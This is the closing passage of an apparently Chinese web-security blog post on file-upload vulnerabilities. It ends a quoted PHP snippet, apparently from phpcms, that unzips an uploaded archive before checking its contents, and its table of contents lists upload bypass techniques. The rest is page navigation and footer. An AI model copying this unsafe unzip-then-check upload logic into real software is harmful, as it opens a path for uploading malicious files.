&#125;</span><br><span class="line">        <span class="comment">// 解压文件</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;pclzip-&gt;<span class="title function_ invoke__">extract</span>(PCLZIP_OPT_PATH, <span class="variable">$dir</span>, PCLZIP_OPT_REPLACE_NEWER) == <span class="number">0</span>) &#123;</span><br><span class="line">            @<span class="title function_ invoke__">dr_dir_delete</span>(<span class="variable">$dir</span>);</span><br><span class="line">            <span class="keyword">exit</span>(<span class="variable language_">$this</span>-&gt;pclzip-&gt;<span class="title function_ invoke__">zip</span>(<span class="literal">true</span>));</span><br><span class="line">        &#125;</span><br><span class="line">        @<span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">is_file</span>(<span class="variable">$dir</span>.<span class="string">&#x27;45x45.jpg&#x27;</span>) || !<span class="title function_ invoke__">is_file</span>(<span class="variable">$dir</span>.<span class="string">&#x27;90x90.jpg&#x27;</span>)) &#123;</span><br><span class="line">            <span class="keyword">exit</span>(<span class="string">&#x27;文件创建失败&#x27;</span>);</span><br><span class="line">        &#125;  </span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/File-upload/" rel="tag"><i class="ic i-tag"></i> File upload</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2022-10-28 16:54:47" itemprop="dateModified" datetime="2022-10-28T16:54:47+08:00">2022-10-28</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2022/04/16/Upload/" title="File upload">http://example.com/2022/04/16/Upload/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicmnywqgpj20zk0m8dwx.jpg" title="SQL injection">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> web安全</span>
  <h3>SQL injection</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/05/17/include/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giciub8ja1j20zk0m81ky.jpg" title="file include">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> web安全</span>
  <h3>file include</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#upload"><span class="toc-number">1.</span> <span class="toc-text"> Upload</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#upload-labs"><span class="toc-number">1.1.</span> <span class="toc-text"> upload-labs</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%98%B2%E5%BE%A1%E4%B8%8E%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.</span> <span class="toc-text"> 文件上传防御与绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpiiswindows-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">1.3.</span> <span class="toc-text"> php+IIS+Windows 文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E8%A6%86%E7%9B%96%E7%94%9F%E6%88%90%E6%96%87%E4%BB%B6"><span class="toc-number">1.3.1.</span> <span class="toc-text"> 利用：覆盖生成文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E9%BB%98%E8%AE%A4%E6%95%B0%E6%8D%AE%E6%B5%81%E4%B8%8A%E4%BC%A0php%E6%96%87%E4%BB%B6"><span class="toc-number">1.3.2.</span> <span class="toc-text"> 通过默认数据流上传 php 文件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpcms%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%9B%9B%E6%AC%A1%E7%BB%95%E8%BF%87"><span class="toc-number">1.4.</span> <span class="toc-text"> phpcms 文件上传四次绕过</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
        <ul>
          <li><a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" rel="bookmark" title="SQL injection">SQL injection</a></li><li class="active"><a href="/2022/04/16/Upload/" rel="bookmark" title="File upload">File upload</a></li><li><a href="/2022/05/17/include/" rel="bookmark" title="file include">file include</a></li><li><a href="/2022/05/27/CSRF/" rel="bookmark" title="CSRF">CSRF</a></li><li><a href="/2022/06/27/SSRF/" rel="bookmark" title="SSRF">SSRF</a></li><li><a href="/2022/08/16/Unserialize/" rel="bookmark" title="unserialize">unserialize</a></li><li><a href="/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/" rel="bookmark" title="JWT">JWT</a></li><li><a href="/2022/11/27/CDN/" rel="bookmark" title="CDN&DNS">CDN&DNS</a></li><li><a href="/2022/11/27/Docker%E9%80%83%E9%80%B8/" rel="bookmark" title="docker逃逸&capabilities">docker逃逸&capabilities</a></li><li><a href="/2022/12/27/SSTI/" rel="bookmark" title="SSTI">SSTI</a></li><li><a href="/2022/12/31/webshell/" rel="bookmark" title="webshell">webshell</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="John Doe"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">John Doe</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">31</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">4</span>
        <span class="name">categories</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">4</span>
        <span class="name">tags</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/05/17/include/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/05/27/CSRF/" title="CSRF">CSRF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/01/20/VXLAN/" title="VXLAN">VXLAN</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/04/16/Upload/" title="File upload">File upload</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/12/28/mysql/" title="Mysql">Mysql</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%A7%8B%E6%8B%9B/" title="In 秋招">秋招</a>
</div>

    <span><a href="/2022/10/27/%E7%A7%8B%E6%8B%9B%E6%80%BB%E7%BB%93/" title="秋招总结">秋招总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" title="SQL injection">SQL injection</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/" title="JWT">JWT</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%A7%8B%E6%8B%9B/" title="In 秋招">秋招</a>
</div>

    <span><a href="/2022/10/28/%E7%A7%8B%E6%8B%9B%E9%9D%A2%E8%AF%95%E9%A2%98/" title="秋招面试题">秋招面试题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/01/17/Segment%20Routing/" title="Segment Routing">Segment Routing</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/07/TCPIP_new/" title="TCP&#x2F;IP">TCP/IP</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/04/16/Upload/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)Booooom"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,
    copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
